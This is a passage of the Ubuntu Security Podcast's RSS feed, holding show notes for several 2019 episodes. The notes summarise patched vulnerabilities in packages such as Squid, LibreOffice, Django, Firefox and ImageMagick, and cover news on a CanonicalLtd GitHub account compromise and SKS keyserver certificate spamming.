<li>Found 2 through fuzzing, 1 though code-analysis whilst analysing first two vulnerabilites</li>
<li>2 fuzzing bugs
<ul>
<li>1 NULL pointer dereference (crash, DoS)</li>
<li>1 infinite loop (CPU DoS)</li>
</ul>
</li>
<li>1 zip slip - write files outside of working directory when handling zip files (EPUB is a ZIP file)</li>
<li>Great write-up on his blog:
<ul>
<li><a href="https://salvatoresecurity.com/fun-with-fuzzers-or-how-i-discovered-three-vulnerabilities-part-1-of-3/">https://salvatoresecurity.com/fun-with-fuzzers-or-how-i-discovered-three-vulnerabilities-part-1-of-3/</a></li>
<li><a href="https://salvatoresecurity.com/fun-with-fuzzers-how-i-discovered-three-vulnerabilities-part-2-of-3/">https://salvatoresecurity.com/fun-with-fuzzers-how-i-discovered-three-vulnerabilities-part-2-of-3/</a></li>
<li><a href="https://salvatoresecurity.com/fun-with-fuzzers-how-i-discovered-three-vulnerabilities-part-3-of-3/">https://salvatoresecurity.com/fun-with-fuzzers-how-i-discovered-three-vulnerabilities-part-3-of-3/</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4056-1-exiv2-vulnerabilities">[<a href="https://usn.ubuntu.com/4056-1/">USN-4056-1</a>] Exiv2 vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13114">CVE-2019-13114</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13113">CVE-2019-13113</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13110">CVE-2019-13110</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13112">CVE-2019-13112</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19535">CVE-2018-19535</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19108">CVE-2018-19108</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19107">CVE-2018-19107</a></li>
</ul>
</li>
<li>Library and CLI toolks to manage image metadata</li>
<li>All DoS - assertion failure / NULL pointer dereference / OOB read /
uncontrolled memory allocation / infinite loop</li>
</ul>
<h3 id="usn-4057-1-zipios-vulnerability">[<a href="https://usn.ubuntu.com/4057-1/">USN-4057-1</a>] Zipios vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13453">CVE-2019-13453</a></li>
</ul>
</li>
<li>Same as the flightcrew infinite loop issue since flightcrew contains an
embedded copy of zipios</li>
</ul>
<h3 id="usn-4058-1-bash-vulnerability">[<a href="https://usn.ubuntu.com/4058-1/">USN-4058-1</a>] Bash vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9924">CVE-2019-9924</a></li>
</ul>
</li>
<li>rbash did not prevent modifying BASH_CMDS so user could execute any
commands as the shell, defeating the purpose of rbash</li>
</ul>
<h3 id="usn-4059-1-usn-4059-2-squid-vulnerabilities">[<a href="https://usn.ubuntu.com/4059-1/">USN-4059-1</a>, <a href="https://usn.ubuntu.com/4059-2/">USN-4059-2</a>] Squid vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13345">CVE-2019-13345</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19132">CVE-2018-19132</a></li>
</ul>
</li>
<li>XSS in cachemgr CGI web module, and memory leak in SNMP module</li>
</ul>
<h3 id="usn-4060-1-usn-4060-2-nss-vulnerabilities">[<a href="https://usn.ubuntu.com/4060-1/">USN-4060-1</a>, <a href="https://usn.ubuntu.com/4060-2/">USN-4060-2</a>] NSS vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11729">CVE-2019-11729</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11727">CVE-2019-11727</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11719">CVE-2019-11719</a></li>
</ul>
</li>
<li>3 of the CVEs from the Firefox update (since Firefox contains libnss)
<ul>
<li>Empty public keys could trigger a segfault</li>
<li>Possible to force to sign with wrong signature type with TLS 1.3</li>
<li>OOB read when importing a private key with leading NUL bytes -&gt; info
disclosure / crash</li>
</ul>
</li>
</ul>
<h3 id="usn-4061-1-redis-vulnerabilities">[<a href="https://usn.ubuntu.com/4061-1/">USN-4061-1</a>] Redis vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10193">CVE-2019-10193</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10192">CVE-2019-10192</a></li>
</ul>
</li>
<li>1 stack, and 1 heap based buffer overflows when handling purposely
corrupted hyperloglog data structure</li>
</ul>
<h3 id="usn-4062-1-wavpack-vulnerabilities">[<a href="https://usn.ubuntu.com/4062-1/">USN-4062-1</a>] WavPack vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1010319">CVE-2019-1010319</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010318">CVE-2019-1010318</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010317">CVE-2019-1010317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010315">CVE-2019-1010315</a></li>
</ul>
</li>
<li>3 different DoS issues (1 CVE was found to be the same as the other)
<ul>
<li>2 * use of uninitialised variable</li>
<li>Divide by zero</li>
</ul>
</li>
</ul>
<h3 id="usn-4063-1-libreoffice-vulnerabilities">[<a href="https://usn.ubuntu.com/4063-1/">USN-4063-1</a>] LibreOffice vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9849">CVE-2019-9849</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9848">CVE-2019-9848</a></li>
</ul>
</li>
<li>RCE via a malicious document - docs can contain python - and this can be
used with the built-in LibreLogo turtle graphics script to execute
bundled python code - so can get RCE via a mouse-over event using
LibreLogo and embedded python</li>
<li>Stealth mode - documents can only fetch resources from &rsquo;trusted'
locations
<ul>
<li>Allows to disable the normal remote resource handling in documents to
be a more private mode</li>
<li>BUT bullet graphics not included - so could specify a remote bullet
graphic from a non-trusted location and would still be fetched</li>
</ul>
</li>
</ul>
<h3 id="usn-4065-1-squid-vulnerabilities">[<a href="https://usn.ubuntu.com/4065-1/">USN-4065-1</a>] Squid vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12529">CVE-2019-12529</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12527">CVE-2019-12527</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12525">CVE-2019-12525</a></li>
</ul>
</li>
<li>3 different possible crash bugs via memory corruption -&gt; DoS, but also
maybe RCE&hellip;
<ul>
<li>1 when using digest auth and 2 for basic auth</li>
</ul>
</li>
</ul>
<h3 id="usn-4066-1-libmspack-vulnerability">[<a href="https://usn.ubuntu.com/4066-1/">USN-4066-1</a>] libmspack vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1010305">CVE-2019-1010305</a></li>
</ul>
</li>
<li>Buffer over-read with malicious chm file -&gt; crash, DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussion-with-joe-mcmanus-on-recent-large-gdpr-fines-for-marriot-and-british-airways">Discussion with Joe McManus on recent large GDPR fines for Marriot and British Airways</h3>
<ul>
<li><a href="https://thehackernews.com/2019/07/british-airways-breach-gdpr-fine.html">https://thehackernews.com/2019/07/british-airways-breach-gdpr-fine.html</a></li>
<li><a href="https://threatpost.com/marriott-123m-fine-data-breach/146320/">https://threatpost.com/marriott-123m-fine-data-breach/146320/</a></li>
</ul>
<h3 id="ubuntu-18-dot-10--cosmic-cuttlefish--end-of-life">Ubuntu 18.10 (Cosmic Cuttlefish) End-of-Life</h3>
<ul>
<li>Ubuntu 18.10 Cosmic Cuttlefish EOL was on 18th July, 2019</li>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-July/005021.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-July/005021.html</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E040.mp3" length="25992581" type="audio/mpeg" /><itunes:duration>27:04</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 39
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-39/</link>
          <pubDate>Tue, 09 Jul 2019 14:52:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E039.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 39</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A look at security updates for Django, Thunderbird, ZNC, Irssi and more,
  plus news on the CanonicalLtd GitHub account credentials compromise, SKS
  PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A look at security updates for Django, Thunderbird, ZNC, Irssi and more,
  plus news on the CanonicalLtd GitHub account credentials compromise, SKS
  PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.
  </itunes:summary>
        <description>  A look at security updates for Django, Thunderbird, ZNC, Irssi and more,
  plus news on the CanonicalLtd GitHub account credentials compromise, SKS
  PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.
  </description>
        <googleplay:description>  A look at security updates for Django, Thunderbird, ZNC, Irssi and more,
  plus news on the CanonicalLtd GitHub account credentials compromise, SKS
  PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A look at security updates for Django, Thunderbird, ZNC, Irssi and more,
plus news on the CanonicalLtd GitHub account credentials compromise, SKS
PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>7 unique CVEs addressed</p>
<h3 id="usn-4043-1-django-vulnerabilities">[<a href="https://usn.ubuntu.com/4043-1/">USN-4043-1</a>] Django vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12781">CVE-2019-12781</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12308">CVE-2019-12308</a></li>
</ul>
</li>
<li>If using django via a reverse proxy, which itself would connect to django
over HTTPS, if accessing HTTP resources they would not be redirected to
HTTPS even if configured to do so on the django server.</li>
<li>XSS via the &lsquo;Current URL&rsquo; link as this was not validated as a safe URL
before display - so possible to inject javascript etc via a URL query
payload parameter etc - such that when the user clicks the link it would
be executed (RCE bug with user interaction)</li>
</ul>
<h3 id="usn-4045-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/4045-1/">USN-4045-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11708">CVE-2019-11708</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11707">CVE-2019-11707</a></li>
</ul>
</li>
<li>Latest upstream 60.7.2 release</li>
<li>Mentioned in the context of Firefox in <a href="https://ubuntusecuritypodcast.org/episode-37/">Episode 37</a> and <a href="https://ubuntusecuritypodcast.org/episode-38/">Episode 38</a> (sandbox
escape and RCE)</li>
<li>By default scripting is disabled in TB so not as high an impact</li>
</ul>
<h3 id="usn-4044-1-znc-vulnerability">[<a href="https://usn.ubuntu.com/4044-1/">USN-4044-1</a>] ZNC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12816">CVE-2019-12816</a></li>
</ul>
</li>
<li>ZNC provides support for plugin modules</li>
<li>These can be loaded by autenticated, non-admin users</li>
</ul>
<p>i  - The name of this is checked in various places to ensure control
characters and other means of code execution are blocked, but not on
all code-paths using modules</p>
<ul>
<li>Would allow to execute code as the ZNC server via an authenticated user</li>
<li>Fixed to validate module name on all code paths which use it</li>
</ul>
<h3 id="usn-4038-3-usn-4038-4-bzip2-regression">[<a href="https://usn.ubuntu.com/4038-3/">USN-4038-3</a>, USN-4038-4] bzip2 regression</h3>
<ul>
<li>Affecting Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-38/">Episode 38</a> mentioned bzip2 update - we also mentioned this breaks
decompression of some archives built by lbzip2 etc - this regression
fixes that by introducing a new patch proposed by upstream to accept as
many selectors as specified by to then discard them later</li>
</ul>
<h3 id="usn-4046-1-irssi-vulnerabilities">[<a href="https://usn.ubuntu.com/4046-1/">USN-4046-1</a>] Irssi vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13045">CVE-2019-13045</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7054">CVE-2018-7054</a></li>
</ul>
</li>
<li>2 different UAF&rsquo;s due to mismanagement of data structures:
<ul>
<li>One on SASL code-paths - so only affected if using SASL
authentication - would reuse provided username and password
fields after they had been freed</li>
<li>Another in code to handle netsplits (used to handle when servers get
disconnected from the wider network)
<ul>
<li>This was due to an incomplete fix for previous CVE-2017-7191</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-18-dot-10--cosmic-cuttlefish--reaches-end-of-life-on-july-18-2019">Ubuntu 18.10 (Cosmic Cuttlefish) reaches End of Life on July 18 2019</h3>
<ul>
<li>Released October 18, 2018 - non-LTS so 9 months of support</li>
<li>Past 9 months - no new updates/ security fixes and hence no USNs</li>
<li>Upgrade to Disco (19.04)</li>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-July/004996.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-July/004996.html</a></li>
</ul>
<h3 id="canonicalltd-github-organisation-account-compromise">CanonicalLtd GitHub organisation account compromise</h3>
<ul>
<li>A single account which was part of the CanonicalLtd GitHub organisation
was compromised 6th July</li>
<li>Used to create proof-of-concept repositories and issues to demonstrate
the hack was possible</li>
<li>Investigation is still on-going but at this stage it only appears to be
these actions, not malicious but attention seeking in nature
<ul>
<li>No code has been altered or PII accessed (nor is any PII stored there)</li>
</ul>
</li>
<li>Account has been removed from the CanonicaLtd organisation, investigation
is still on-going, we will release more details as they become available</li>
<li><a href="https://twitter.com/ubuntu_sec/status/1147675201632473088">https://twitter.com/ubuntu_sec/status/1147675201632473088</a></li>
</ul>
<h3 id="sks-keyserver-certificate-spamming">SKS keyserver certificate spamming</h3>
<ul>
<li><a href="https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f">https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f</a></li>
<li>WoT aspect of PGP allows users to sign one-anothers public keys
(certificates) and upload these signatures to the keyservers</li>
<li>SKS keyservers were designed to never delete anything and instead to append</li>
<li>So when downloading a key (certificate) you get it plus all the signatures</li>
<li>SKS supports up to 150k sigs - GnuPG is logarithmic in order of signatures</li>
<li>So can DoS local GnuPG once have downloaded someones key (cert)</li>
<li>Re Ubuntu:
<ul>
<li>We use GPG for signing the hashes of packages in the repo</li>
<li>This public key is distributed directly inside Ubuntu on install media
and in the archive and does not depend on the SKS keyserver network</li>
<li>Keys for PPAs are fetched from Launchpad, not SKS as well in general</li>
<li>So only exposure for Ubuntu users is if manually fetching keys from SKS
keyservers or if using Enigmail in ThunderBird or other software which
automatically fetches certs from SKS</li>
</ul>
</li>
<li>Mitigation
<ul>
<li>if using Enigmail, <a href="https://www.enigmail.net/index.php/en/user-manual/handbook-faq">disable auto-fetching / refreshing of public keys</a></li>
<li>if using GnuPG directly, don&rsquo;t use SKS keyservers, instead use <a href="https://keys.openpgp.org">new
resistant keyserver</a></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E039.mp3" length="11713006" type="audio/mpeg" /><itunes:duration>12:12</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 38
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-38/</link>
          <pubDate>Tue, 02 Jul 2019 17:00:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E038.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 38</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project...
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project and some of the upcoming features.</itunes:summary>
        <description>This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project and some of the upcoming features.</description>
        <googleplay:description>This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project and some of the upcoming features.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project and some of the upcoming features.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>55 unique CVEs addressed</p>
<h3 id="usn-4031-1-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/4031-1/">USN-4031-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12817">CVE-2019-12817</a></li>
</ul>
</li>
<li>64-bit PowerPC (ppc64el) memory management issue - introduced in the 4.17
kernel - so only affects Cosmic/Disco or Bionic when using the HWE kernel</li>
<li>Different processes might be able to read / write to each others virtual
memory
<ul>
<li>Requirements:
<ul>
<li>Must be using the hash page table MMU - eg. PowerPC 970 (G5), PA6T,
Power5/6/7/8/9
<ul>
<li>By default Power9 bare-metal use the Radix MMU so are not affected
unless have explicitly disabled this via the kernel command-line</li>
<li>KVM guests would also be affected in this case or if also
explicitly configured to use the HPT MMU</li>
<li>Logical partitions (LPARs) under PowerVM on Power9 would be
affected as they always use HPT MMU</li>
</ul>
</li>
<li>Need to allocate memory above 512TB - only possible via mmap()</li>
<li>Any child process (fork()) receives same context-id for the memory
mapping so can just read/write to the mappings above 512TB</li>
<li>If child exits, a 3rd process could be reallocated the same
context-id and so could then read/write also</li>
</ul>
</li>
</ul>
</li>
<li>Only a subset of PowerPC systems will be affected by this and would need
to be running applications which allocate above 512TB so whilst is high
impact, low probability of being at risk</li>
</ul>
<h3 id="usn-4032-1-firefox-vulnerability">[<a href="https://usn.ubuntu.com/4032-1/">USN-4032-1</a>] Firefox vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11708">CVE-2019-11708</a></li>
</ul>
</li>
<li>Firefox 67.0.4 - latest upstream release</li>
<li>Possible for a sandboxed child process to escape the sandbox by using IPC
to send a Prompt:Open message to the parent which would then process
web-content on behalf of the child</li>
<li>Since parent is not sandboxed, it could be then exploited (say by
leveraging another vulnerability such as the one discussed last week for
Firefox) for arbitrary code execution</li>
</ul>
<h3 id="usn-4033-1-libmysofa-vulnerability">[<a href="https://usn.ubuntu.com/4033-1/">USN-4033-1</a>] libmysofa vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10672">CVE-2019-10672</a></li>
</ul>
</li>
<li>C library to read SOFA (Spatially Oriented Format for Acoustics) files
<ul>
<li>Used by lots of different applications that handle audio, like
gstreamer, ffmpeg, smplayer, blender etc</li>
</ul>
</li>
<li>Integer overflow leading to buffer overflow - crash -&gt; DoS or possible
code-execution</li>
</ul>
<h3 id="usn-4034-1-imagemagick-vulnerabilities">[<a href="https://usn.ubuntu.com/4034-1/">USN-4034-1</a>] ImageMagick vulnerabilities</h3>
<ul>
<li>30 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9956">CVE-2019-9956</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7398">CVE-2019-7398</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7397">CVE-2019-7397</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7396">CVE-2019-7396</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7395">CVE-2019-7395</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-7175">CVE-2019-7175</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11598">CVE-2019-11598</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11597">CVE-2019-11597</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11472">CVE-2019-11472</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11470">CVE-2019-11470</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10650">CVE-2019-10650</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10649">CVE-2019-10649</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10131">CVE-2019-10131</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20467">CVE-2018-20467</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18544">CVE-2018-18544</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18025">CVE-2018-18025</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18024">CVE-2018-18024</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18023">CVE-2018-18023</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18016">CVE-2018-18016</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17966">CVE-2018-17966</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17965">CVE-2018-17965</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16645">CVE-2018-16645</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16644">CVE-2018-16644</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16413">CVE-2018-16413</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16412">CVE-2018-16412</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16323">CVE-2018-16323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15607">CVE-2018-15607</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14434">CVE-2018-14434</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12806">CVE-2017-12806</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12805">CVE-2017-12805</a></li>
</ul>
</li>
<li>Used by many automated systems for image processing etc</li>
<li>Many memory corruption issues fixed - most able to cause at least a crash
(DoS) but might be possible to also get RCE</li>
<li>Also updated the default policy to disable support for PostScript and PDF
formats (since these are handle by GhostScript which has a long history
of security issues itself) - Cosmic + Disco
<ul>
<li>This is already the case on Bionic (<a href="https://usn.ubuntu.com/3785-1/">USN-3785-1</a> - <a href="https://ubuntusecuritypodcast.org/episode-7/">Episode 7</a>)</li>
</ul>
</li>
</ul>
<h3 id="usn-4035-1-ceph-vulnerabilities">[<a href="https://usn.ubuntu.com/4035-1/">USN-4035-1</a>] Ceph vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3821">CVE-2019-3821</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16889">CVE-2018-16889</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16846">CVE-2018-16846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14662">CVE-2018-14662</a></li>
</ul>
</li>
<li>2 CVEs affect ceph in Xenial
<ul>
<li>dm-crypt disk encryption keys were able to be read by users with
read-only permissions - fixed to ensure need an explicit permission to
read keys</li>
<li>DoS from authenticated RGW users</li>
</ul>
</li>
<li>2 Cosmic+Disco
<ul>
<li>Does not properly sanitize encryption keys when outputting debug log
information for v4 auth -so encryption keys would be output in
plaintext to debug logs
<ul>
<li>fixed to sanitize before output</li>
<li>won&rsquo;t be fixed for Xenial since upstream hasn&rsquo;t backported this and
there are many instances of other sensitive info being logged there
as well</li>
</ul>
</li>
<li>DoS by unauthenticated remote users via the civetweb frontend - as they
could create connections to a RADOS gateway to exhaust file descriptors
for the gateway service causing it to run out and fail to create new
connections
<ul>
<li>Close fd on error path</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4036-1-openstack-neutron-vulnerability">[<a href="https://usn.ubuntu.com/4036-1/">USN-4036-1</a>] OpenStack Neutron vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9735">CVE-2019-9735</a></li>
</ul>
</li>
<li>Networking abstraction layer of OpenStack</li>
<li>Allows to define security groups with rules which then get executed by a
driver using a particular underlying technology</li>
<li>Rules can specify protocols and source / destination ports</li>
<li>iptables driver would execute rules but if encountered an error (such as
a protocol was specified along with a port but the protocol doesn&rsquo;t
support ports - like VRRP) then it would error out and not apply further
rules from the security group
<ul>
<li>So could block other rules from being applied</li>
</ul>
</li>
<li>Fixed to ensure port arguments are only applied to protocols which
support them</li>
</ul>
<h3 id="usn-4037-1-policykit-desktop-privileges-update">[<a href="https://usn.ubuntu.com/4037-1/">USN-4037-1</a>] policykit-desktop-privileges update</h3>
<ul>
<li>Affecting Xenial, Bionic, Cosmic, Disco</li>
<li>PolicyKit policy update for USB Creator
<ul>
<li>Previously would allow a user with admin privileges (ie. in the
admin/sudo group) to overwrite disks (ie create bootable USB images)
without prompting for authentication</li>
<li>Now updated to require the user to also authenticate as well</li>
</ul>
</li>
</ul>
<h3 id="usn-4038-1-usn-4038-2-bzip2-vulnerabilities">[<a href="https://usn.ubuntu.com/4038-1/">USN-4038-1</a>, <a href="https://usn.ubuntu.com/4038-2/">USN-4038-2</a>] bzip2 vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12900">CVE-2019-12900</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-3189">CVE-2016-3189</a></li>
</ul>
</li>
<li>UAF via crafted bzip2 file - crash, DoS</li>
<li>OOB write from crafted bzip2 which contains too many selectors - possible
RCE
<ul>
<li>Turns out this breaks decompression of some bzip2 files created by the
lbzip2 utility since it would use an invalid number of selectors -
<a href="https://gitlab.com/federicomenaquintero/bzip2/issues/24">upstream still pondering how to fix this</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4040-1-usn-4040-2-expat-vulnerability">[<a href="https://usn.ubuntu.com/4040-1/">USN-4040-1</a>, <a href="https://usn.ubuntu.com/4040-2/">USN-4040-2</a>] Expat vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20843">CVE-2018-20843</a></li>
</ul>
</li>
<li>CPU DoS if XML names contained large number of colons (used to specify
namespace prefix)</li>
</ul>
<h3 id="usn-4042-1-poppler-vulnerabilities">[<a href="https://usn.ubuntu.com/4042-1/">USN-4042-1</a>] poppler vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9903">CVE-2019-9903</a></li>
